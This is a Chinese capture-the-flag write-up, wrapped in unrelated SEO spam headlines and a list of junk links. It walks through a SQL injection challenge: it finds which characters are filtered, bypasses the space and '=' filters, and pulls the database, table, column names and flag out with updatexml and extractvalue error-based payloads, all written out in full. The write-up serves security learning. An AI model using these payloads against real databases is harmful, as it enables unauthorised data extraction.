当前位置: 首页 > news >正文

网站上线注意响应式酒店网站模板

网站上线注意,响应式酒店网站模板,室内装修软件哪个好,衡水营销网站建设题目环境: 没错,又是我,这群该死的黑客竟然如此厉害,所以我回去爆肝SQL注入,这次,再也没有人能拿到我的flag了 做了好多这个作者出的题了,看来又要上强度了 判断注入类型 username:a…

题目环境:
image.png

没错,又是我,这群该死的黑客竟然如此厉害,所以我回去爆肝SQL注入,这次,再也没有人能拿到我的flag了
做了好多这个作者出的题了,看来又要上强度了

判断注入类型

username:admin
password:1
这里把参数password作为注入点

image.png
1'
image.png

单引号的字符型注入

万能密码注入
1' or '1'='1
image.png

万能密码注入被链接
猜测某些字符或者关键字被过滤

SQL注入字典查过滤字符
image.png
Intruder字典爆破
image.png
光标选中参数password的值1-Add选择爆破目标image.png
选用字典
image.png
Start attack开始爆破
image.png
OK
image.png
爆破结果:
image.png

741为过滤内容
可以看到很多字符=、–+、/**/和一些注入命令union、by、‘1’='1等被过滤

继续测试

admin
1’ or

image.png
image.png

可以看到被拦截了
通过刚才的字典爆破,可以知道1’和or是没有被过滤的
那么真相只有一个,卧槽,空格被过滤了,我直呼好家伙

刚开始本想尝试编码绕过空格,结果不行,这里猜测到了空格限制

空格限制

admin
1’(or)

image.png

like没有被过滤,使用like可以绕过=号,like <=> =

重新构造万能密码
1'or((1)like(1))#
image.png
image.png

可以看到绕过了空格限制
同时也登陆成功了
然后想到了之前做过很类似的一道题
SQL报错注入也用到了空格限制
(已经试了堆叠注入和联合注入都不行)
这里就索性试一下SQL报错注入

知识一、

SQL报错注入常用函数

两个基于XPAT(XML)的报错注入函数
函数updatexml() 是mysql对xml文档数据进行查询和修改的xpath函数
函数extractvalue() 是mysql对xml文档数据进行查询的xpath函数
注入原理:
(在使用语句时,如果XPath_string不符合该种类格式,就会出现格式错误,并且会以系统报错的形式提示出错误!)
(局限性查询字符串长度最大为32位,要突破此限制可使用right(),left(),substr()来截取字符串)

其它
函数floor() mysql中用来取整的函数
函数exp() 此函数返回e(自然对数的底)指数X的幂值的函数

首先使用updatexml()函数进行SQL报错注入
爆库
1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#
image.png

得到库名geek

查表
1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#
image.png

得到数据表H4rDsq1

爆字段
1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#
image.png

得到三个字段:id、username、password

查字段内容
1'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#
image.png

得到前一半flag值flag{389c9161-c2eb-403a-80

使用right()突破字符限制
1'or(updatexml(1,concat(0x7e,(select(group_concat((right(password,25))))from(H4rDsq1)),0x7e),1))#
image.png

得到后一段flag值b-403a-8062-80f219ca1c30}

拼接得到最终flag:
flag{389c9161-c2eb-403a-8062-80f219ca1c30}

使用extractvalue()函数进行SQL报错注入

知识:^这个符号可以绕过or的限制
这两种函数大同小异,不再赘述
当然也可以不使用^来绕过or限制,单一的()绕过空格限制也可以
大家可以看下边进行对比学习

1'^extractvalue(1,concat(0x7e,(select(database()))))#
image.png
image.png
1'or(extractvalue(1,concat(0x7e,(select(database())))))#
image.png
image.png

好了大家已经明显看到了^和()绕过不同限制的区别
那么下面就给大家一直演示^绕过or限制了(上一个updatexml()函数使用的是()绕过空格限制)

1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like('geek'))))#
image.png
1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))#
image.png
1'^extractvalue(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1))))#
image.png
使用right()突破字符限制
1'^extractvalue(1,right(concat(0x7e,(select(group_concat(password))from(H4rDsq1))),30))#
image.png
拼接得到最终flag:
flag{389c9161-c2eb-403a-8062-80f219ca1c30}

http://www.yayakq.cn/news/718183/

相关文章:

  • 网站与平台的开发区别成都自适应建站哪家好
  • 省建设执业资格注册中心网站跨境数据专线内部管理
  • 网站页面怎么做地图外贸网站建设十大标准外贸网站建站
  • 网站收录是怎么回事苏州网站设计kgwl
  • 广东企业网站制作公司logo在线制作 免费
  • 个人网站设计模板建设银行总行网站
  • 网站建设 运维 管理超详细的wordpress主题
  • 建设执业注册中心网站wordpress缓存稿
  • 模仿建设银行网站如何做阿里详情页面链接到外部网站
  • 哪些企业用wordpress建站天津seo选天津旗舰科技a
  • php商城网站开发实例视频教程注册网站域名要钱吗
  • 网站买云服务哪家好为什么会有人攻击我用织梦做的网站
  • 门户网站解决方案wordpress 主题 制作
  • 阿里云服务器网站目录微软 网站开发
  • 重庆网站建设培训机构js 网站头部固定
  • 一键生成表白网站微信软文范例大全100
  • 建设银行河北省分行网站centos架设wordpress
  • 网站建设找什么公司零基础考二建有多难
  • 内蒙古网站建设流程无锡公司网站制作
  • 百度联盟广告点击技巧银川网站怎么做seo
  • 餐饮网站建设设计价格wordpress usermeta
  • 佛山市网站建设分站企业网页设计图片轮播
  • 请教个人主页网站怎么做啊建设网站需要哪些
  • 建站平台 在线提交表格网站怎么更改布局
  • 福州网站设计大概多少钱网站前台管理系统
  • 做网站网页需要什么软件jsp网站购物车怎么做
  • 网站系统找不到指定的文件网站建设做哪 个会计科目
  • 天津市精神文明建设网站网站建设系统平台
  • 食药监局网站建设方案文字图片制作网站
  • 合肥网站营销网站备案号 放网站